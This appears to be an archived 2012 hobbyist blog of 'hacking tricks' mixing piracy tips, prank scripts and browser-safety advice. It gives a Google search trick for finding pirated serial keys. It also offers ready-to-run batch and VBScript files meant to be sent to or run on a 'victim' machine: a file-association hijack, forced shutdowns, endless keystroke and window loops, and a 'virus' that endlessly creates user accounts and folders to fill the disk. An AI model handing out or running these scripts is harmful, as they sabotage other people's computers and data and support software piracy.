Sunday, 29 April 2012

Serial Key / Cracks for Any Software !

Serial Key / Cracks for Any Software !


Once Again i am back with a worthy article for timepasswidtrix.blogspot.in members, This time i am going to explain you that how you can "Find Serial Key / Cracks for Any Software !".I assume that most of you use pirated software. Not everyone can afford buying a program like Photoshop, which costs $699. In this case you can use alternative, free software or you can download a pirated, cracked version of the program. There is a vast number of websites out there, where you can find serial numbers and cracks for any program, but most of them aren't safe to use. Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken  or Srizbi Botnet army. In this post I will show you the most efficient way of downloading cracks and serial numbers without any risk to your pc. This is the "Google Way"


Google Hacking : I will explain google hacking in details in next article very soon.But for now its enough to know that,Google hacking means..how you can search all desired information in direct way,using some google searching tricks.

Now in this article i am going to explain all possible ways to Find the serial Key
a.) Using Google
Finding Serial Key using Google :

To Get the serial number from googleyou have to just follow these steps :


* Go to Google.

* In the search field type : "Software name" 94FBR

* Where, "Software Name" is the name of the item you want to find the serial number for.

* And in google search Results you will get the list of all those websites where the serial key of the required software is available.Thats it !!  :-)

HOW DOES THIS WORK ?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.


1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches :
Search the following Keywords on Google :-

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

This tutorial is for educational purpose,using this keys give rise to piracy .and we need to stop it

[][]EXTENSION CHANGER[][]



Here in this article i came with Extension changer code today i am gonna showing you how to change an Extension of an files.

What is Extension changer ?

Assume that all images (*.jpeg, Gif etc) are by default opening with "Windows Picture and Fax Viewer" but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.
1. Open a Notepad and copy and paste the below code

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit

2. Save it as extension.bat, and now you are ready to go…

3. Execute this on Victims computer

This Command Line File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…

The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….


Saturday, 14 April 2012

make ur own !!!!


How to create cool pics ..?


Edit any webpage with just this javascript code 

1.Go To the page,which you want to edit

2.Enter " javascript:" in address bar ( without quotes ,Enter 


Manually dont try to copy and paste)



3.Append the code (u can copy this)

document.body.contentEditable='true'; 


document.designMode='on'; void 0

4.Hit Enter

Thats it You can edit the webpage (Some texts are image 


files,you cant edit images)

If u take snapshot of it by using either "snipping tool" or by 


print screen key

Is she a Hacker ?


Ying Cracker is an educator from Shanghai…
It was in a “Chinese Hottie Hackers” forum posting that got Cracker noticed by gawkers on the internet and created a huge fan base for her. Her work is impressive as well. She’s an expert in hacker software writing and charges good money for courses on simple hacking tools. She also charges between RMB 500-5000 in helping other people crack software and usually makes about RMB 15,000 per month in the hacking business and for that, she deserves your respect

Kristina Svechinskaya is a New York University student who was arrested on November 2, 2010 for defrauding US and British banks out of millions of dollars.
Along with eight other people, Svechinskaya hacked into thousands of bank accounts and skimmed $3 million in total. That’s right. The bra you see her wearing in this picture could possibly be made of diamonds.

Ada Lovelace

No hot hackers can be saluted today without paying tribute to the original female hacker in history, Ada Lovelace. The only legitimate child of poet Lord Byron, Lovelace was known as “The Enchantress of Numbers” for her exquisite skill in mathematics. She’s credited for creating the world’s first computer algorithm(Before any computer was actually made!) after coming up with a method for calculating a sequence of Bernoulli numbers with the Analytic Engine (the earliest form of a computer).

Raven Adler

Today, she continues to design, test and audit hacking detector systems for large federal agencies. She’s also trained in the Shorin Ryu Matsumura discipline of martial arts. Just in case you’re still not convinced she could literally destroy your entire life. Your. Entire. Life.

Joanna Rutkowska

An elite hacker herself and has launched her own security services startup called Invisible Things Labs (which as far as software goes, actually isn’t a bad name.) Even teaming up with the “good guys” at Microsoft, Rutkowska advised vice president of Microsoft’s Security Technology Unit on tightening the security on Windows Vista.

Are you interested to know more about them. I thought you are interested in pics.
No problem Click here and watch them all :)

What are the secure browsing strategies ?


tips for Secure Browsing

  • Always use the most current version of your browser.
  • Check for the “lock” icon on the status bar that shows that you are on a secured web site. Also check that the URL begins with “https” in the location bar when making transactions online.
  • In the Tools menu of Firefox, Tools > Options… > Privacy, you can clear your information with one click of a button. This is especially useful when using a computer in a public location.
  • Perform transactions (like shopping or submitting personal information) at sites that are well established and that are familiar to you. If you’re not familiar with a site, make sure that the site has a privacy policy and information about the site’s security measures.

  • Remember Browsers keep a sandbox for each opened page. Nowadays, a malicious site can take complete control over your computer and look at, modify or destroy anything on your computer!
Yes, a website can exploit holes in a browser and place a shell on the computer giving it total access to passwords, installing root kits, etc.
 The NoScript Firefox extension provides extra protection for Firefox, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JavaScriptJavaFlash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank).
NoScript also provides the most powerful anti-XSS and anti-Clickjacking protection ever available in a browser.
NoScript’s unique whitelist based pre-emptive script blocking approach prevents exploitation of security vulnerabilities (known and even not known yet!) with no loss of functionality…
You can enable JavaScript, Java and plugin execution for sites you trust with a simple left-click on the NoScript status bar icon (look at the picture), or using the contextual menu, for easier operation in popup statusbar-less windows.
Watch the “Block scripts in Firefox” video by cnet.
Staying safe has never been so easy!
Experts will agree: Firefox is really safer with NoScript!
These details are subjected to a windows machine (So, if you don’t like windows then you should skip this block)

An Example of Why Running as an Admin Is Bad

Some nasty malware works only because the user browsing the Web is an administrator. A good example is a recent variation of the Bagle/Beagle worm named W32.Beagle.AV@mm. I would recommend you read up on what the worm does once it is invited onto a computer system. Symantec has a good write-up athttp://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.av@mm.html. I say invited because the malware is not taking advantage of a coding or design defect. It is using simple human error to execute.
Among the many things this malware does, all of which require admin rights, are:
  • Creating files in the system32 directory.
  • Terminating various processes.
  • Disabling the Windows Firewall.
  • Downloading and writing files to the system32 directory.
  • Deletes registry values in HKLM.
All these fail if the user running the e-mail client is not an administrator.
So wouldn’t it be useful (read: safer) if you could browse the Web, read e-mail, and so on as a non-admin, even though you need to perform your normal daily tasks as an admin? Luckily, Windows XP and Windows Server 2003 and later support this capability using restricted tokens.

The DropMyRights Application

DropMyRights is a very simple application to help users who must run as an administrator run applications in a much-safer context—that of a non-administrator. It does this by taking the current user’s token, removing various privileges and SIDs from the token, and then using that token to start another process, such as Internet Explorer or Outlook. This tool works just as well with Mozilla’s Firefox, Eudora, or Lotus Notes e-mail. Go to its site to know how to install it.
Chrome, at this time, is the most secure browser that exists in windows, because of the sandboxing techniques it uses which add up to the security.A good description of this sandbox is here: http://dev.chromium.org/developers/design-documents/sandbox
The general idea is that a malicious website will have to use two separate exploits to achieve code execution on your pc: The first one exploiting the browser, the second exploiting the sanbox. This has been proven a very hard thing to do – it has not be done ever.
Internet Explorer 9 is advertised as having a sandbox, but security researchers agree that it is not properly implemented and have demonstrated successful attacks against it.
There are numerous technologies you can use. It all depends on your OS and how far you want to go.
On Windows, the easiest is to use Sandboxie to sandbox your browser. On Linux/BSD you could setup a chroot or jail to run the browser from.
Another choice is to set up a virtual machine using Vmware, KVM , Xen, VirtualBox or Parallels and run a browser in there. This will require you to install a full OS, but will give you an extra level of isolation.
you can also try
Browser SandBox at spoon.net.
See this video, you can never be 100% sure that you are safe, so be careful, don’t open links you don’t know where they go or don’t trust the sites.
NSA (National Security Agency) of United States published a document indicating “Best Practices” for user security on the internet:

Friday, 13 April 2012

most dangerous VB script

1) Convey a little message and shut down the computer:

Type :


@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle the Caps Lock button simultaneously:

Type :


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out the CD Drive. If there are more than one, it pops out all of them!

Type :


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate someone by making this VBScript hit Enter simultaneously:

Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" after some time of clicking the file and freak someone out:

Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate someone by making this VBScript hit Backspace simultaneously:

Type :


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack the keyboard and make it type "You are a fool" continuously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")

do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:

Type :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:


1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

Saturday, 7 April 2012

Check If Your Antivirus Is truly Working Or not.

Just Copy the below text issued by EICAR ANTIVIRUS TEST to test antiviruses all over the world. Copy the text and paste in a notepad and save anywhere except desktop. save it as .bat extension.  
eg.  Newtextdocument.bat



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


as soon as you do, your antivirus should be able to detect and automatically delete it.


if not you might need to change your antivirus.

Virus Making


Virus ( Dangerous one ) , overload victum's PC




@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1





copy above codes in notepad and save it as .cmd , or .bat ( more better ) :)
and its ready to use .


what does it do :

 This is an extremely harmful virus the will keep
replicating itself until your harddrive is totally full and will destroy
your computer , or any computer on which it is used .

Share Files over the INTERNET via BROWSER to BROWSER.No upload or dwnlod



Folks...............I just found this usefull trick while surfing. So i thought of sharing it wid you all.


Step 1 : Go to FilesOverMiles website. Click "Browse" and select the file to transfer.

http://www.filesovermiles.com/


Step 2 : You will get a LINK instantly as soon as you click on the file to send..Give that link over to your friend through GTALK or any other process.


Step 3 (2nd User) : The PC on the receiving end of this file transfer must go this unique url which will show a download option from the file to be transferred PC to PC.








Note : The transfer file will continue to be available for download until the web page on 1st user’s browser is closed.